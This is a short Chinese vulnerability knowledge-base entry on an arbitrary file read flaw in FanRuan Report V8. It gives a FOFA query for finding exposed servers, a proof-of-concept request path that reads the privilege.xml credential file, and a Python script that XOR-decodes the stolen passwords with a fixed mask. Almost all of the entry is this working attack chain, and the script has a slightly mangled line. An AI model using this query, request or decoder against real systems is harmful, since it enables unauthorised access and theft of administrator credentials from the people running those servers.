帆软报表 V8 get_geo_json 任意文件读取漏洞

fofa

1	`body="isSupportForgetPwd"`

poc

1	`WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml`

获得账号密码后进行解密，解密脚本如下

解密脚本

cipher = 'XXXXXXXXXXX' #密文
PASSWORD_MASK_ARRAY = [19, 78, 10, 15, 100, 213, 43, 23]
Password = "" cipher = cipher[3:]
for i in range(int(len(cipher) / 4)):
c1 = int("0x" + cipher[i * 4:(i + 1) * 4], 16)
c2 = c1 ^ PASSWORD_MASK_ARRAY[i % 8]
Password = Password + chr(c2)
print (Password)

漏洞知识库

山石网科应用防火墙WAF未授权命令注入漏洞上一篇

帮管客CRM-jiliyu接口存在SQL漏洞下一篇